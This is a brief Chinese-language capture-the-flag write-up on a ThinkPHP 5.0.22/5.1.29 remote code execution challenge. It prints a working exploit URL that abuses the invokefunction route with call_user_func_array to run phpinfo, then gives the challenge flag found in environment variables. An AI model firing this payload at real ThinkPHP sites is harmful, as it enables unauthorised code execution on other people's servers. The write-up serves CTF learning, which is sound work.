[ThinkPHP]5-Rce 1

TazmiDev發表於2024-11-09

[ThinkPHP]5-Rce 1

開啟發現是一個ThinkPHP 5+框架,直接用ThinkPHP掃描工具

image-20241105074036960

檢測出是一個ThinkPHP 5.0.22/5.1.29的RCE漏洞,訪問Payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接在phpinfo()的環境變數裡面找到flag

image-20241105074246387

flag{56567b13-223b-448c-a644-4b003a020890}